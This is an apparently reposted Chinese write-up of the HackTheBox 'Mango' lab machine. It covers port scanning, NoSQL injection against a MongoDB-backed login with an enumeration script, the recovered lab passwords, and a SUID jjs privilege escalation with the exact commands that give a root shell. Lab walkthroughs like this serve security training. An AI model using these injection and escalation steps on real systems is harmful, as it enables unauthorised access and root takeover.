2. 程式人生 > 其它 >hackthebox-Mango(mongodb滲透 & jjs提權)

hackthebox-Mango(mongodb滲透 & jjs提權)

阿新 發佈:2021-02-15

這臺靶機太卡了。無語

1、掃描

很常規的22可能有ssh登入,80,443web資訊蒐集
另外結果顯示掃描出新地址staging-order.mango.htb,加到本機/etc/hosts

C:\root> masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-14 00:21:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN
 
 Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.162                                    
Discovered open port 80/tcp on 10.10.10.162                                    
Discovered open port 443/tcp on 10.10.10.162                                   
^Zte:  0.00-kpps, 100.00% done, waiting -
 
22-secs, found=3         
[1]+  Stopped                 masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.162 -p22,80,443
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-14 08:25 CST
Nmap scan report for 10.10.10.162 (10.10.10.162)
Host is up (0.38s latency).

PORT    STATE SERVICE
 
  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:

2、nosql & MongoDB 滲透

進入staging-order.mango.htb發現登入框
普通注入無效,沒有賬號密碼爆破,聯想到靶機名mango是否提示mongo&nosql注入,畢竟htb的靶機名經常就是漏洞暗示

手工原理

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection#exploits

指令碼

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

執行指令碼。可能會中斷n次,連不上。。

python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -m POST -up username -pp password -op login:login -ep password

得到密碼

mango:h3mXK8RhU~f{]f5H
admin:t9KcS3>!0B#2

3、提權

ssh登入mango可以成功,再su admin切換。過程可能巨卡。。。

執行linpeas,發現suid有jjs
在這裡插入圖片描述
有提示操作方法https://gtfobins.github.io/gtfobins/jjs/
不過太卡了,各種卡和報錯。
最後還是官方writeup裡的方法簡單好用

Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
/tmp/sh -p

euid是root
在這裡插入圖片描述

相關推薦

hackthebox-Mangomongodb滲透 & jjs

這臺靶機太卡了。無語 1、掃描 很常規的22可能有ssh登入,80,443web資訊蒐集 另外結果顯示掃描出新地址staging-order.mango.htb,加到本機/etc/hosts

Spring Boot 整合——MongoDB整合2MongoDB實體建立以及簡單CRUD

文章前面 關於版本 依賴 版本 springboot 2.0.8.RELEASE mongodb 4.0.14 本內容只是為了介紹mongodb最基礎的使用以及配置,作為一個知名的資料庫,其存在相當多的高階用法,展開來介紹內容會相當多,

CF1404A - Balanced Bitstring數學規律+模擬+字串+高階

2021.10.15補題 1404A - Balanced Bitstring源地址自⇔CF1404A Problem Example 9 6 4 100110 3 2 1?1 3 2

CF1253B - Silly Mistake貪心+構造性演算法+高階

【2021.12.15】隊內賽第一題 【2021.12.20】補題 CF1253B - Silly Mistake源地址自⇔CF1253B

實時&離線面板渲染技術Real-time&Offline Skin Rendering

目錄現實面板模型BSSRDF 渲染模型 [2001]Diffusion Profile擴散剖面[2001]偶極子 [2002]高斯和 [2007]Burley Normalized Diffusion [2015]基於模糊的 SSS 方法紋理空間模糊Texture Space Blur [2003]螢幕空

CF1536C - Diluc and Kaeya資料結構 + 數學規律 / 高階

【2022.03.03】隊內賽第三題,【2022.03.03】補題 1536C - Diluc and Kaeya源地址自⇔CF1536C

靶機Vulnhub的Empire Breakout攻略不含

首先掃描目標有哪些開放的埠: # nmap -sV -A -sC -p- 192.168.140.164 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-14 00:16 EDT

Oracle 執行儲存過程五種方法帶引數& 不帶引數

1.如果是命令視窗就用exec 儲存過程名: 1 EXEC  procedure; --procedure是儲存過程名

MongoDB搭建高可用叢集的完整步驟3個分片+3個副本

配置指令碼以及目錄下載:點我下載 一、規劃好埠ip 架構圖如下,任意抽取每個副本集中的一個分片非仲裁節點可以組成一份完整的資料。

PHP變數作用域全域性變數&區域性變數&global&static關鍵字用法例項分析

本文例項講述了PHP變數作用域全域性變數&區域性變數&global&static關鍵字用法。分享給大家供大家參考,具體如下:

Spring Boot 整合——MongoDB整合4MongoDB分組去重以及MongoDB聯表查詢

文章前面 關於版本 依賴 版本 springboot 2.0.8.RELEASE mongodb 4.0.14 本內容只是為了介紹mongodb最基礎的使用以及配置,作為一個知名的資料庫,其存在相當多的高階用法,展開來介紹內容會相當多,

Spring Boot 整合——MongoDB整合3MongoDB聚合操作

文章前面 關於版本 依賴 版本 springboot 2.0.8.RELEASE mongodb 4.0.14 本內容只是為了介紹mongodb最基礎的使用以及配置,作為一個知名的資料庫,其存在相當多的高階用法,展開來介紹內容會相當多,

ES6標準 Arrow Function箭頭函式=>

ES6—箭頭函式 0.為什麼會出現箭頭函式? 1.傳統的javascript函式語法並沒有提供任何的靈活性,每一次你需要定義一個函式時,你都必須輸入function () {},這至少會出現兩個問題,ES6箭頭函式都圓滿解決了它,

Kali虛擬機器利用msf17-010執行RCE針對Windows Server 2008以及2003

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本,否則拿這個去攻擊Windows Server 2

CVE-2015-1328Ubuntu Linux核心本地漏洞

CVE-2015-1328Ubuntu Linux核心本地漏洞 一、漏洞簡介 本地普通使用者可以利用該漏洞在敏感系統目錄中建立新檔案或讀取敏感檔案內容,從而提升到管理員許可權。

習題:Fafa and Ancient Mathematics樹DP&轉換問題

題目 傳送門 思路 一個括號其實就相當於一個子樹 也就是這是一個樹形DP的題 這題的難點也在於轉換,DP並不是很難

洛谷P1099&Noip 2007提高-樹網的核樹直徑上的尺取

題目連結:https://www.luogu.com.cn/problem/P1099 CSDN食用連結:https://blog.csdn.net/qq_43906000/article/details/107874674

DC-3靶機滲透

0x01收集DC-3靶機的資訊 利用nmap工具掃描DC-3的資訊 利用msf工具掃描出對應的版本資訊

MongoDB 部署 & 基礎命令

MongoDB 官方文件 MongoDB 介紹 Mongodb 由 C++ 語言編寫的,是一個基於分散式檔案儲存的開源資料庫系統。

習題:Complete the Projects (hard version)揹包DP&貪心

題目 傳送門 思路 如果\\(b_i\\)為正,那麼能選的一定會選 現在單獨考慮\\(b_i\\)為負的情況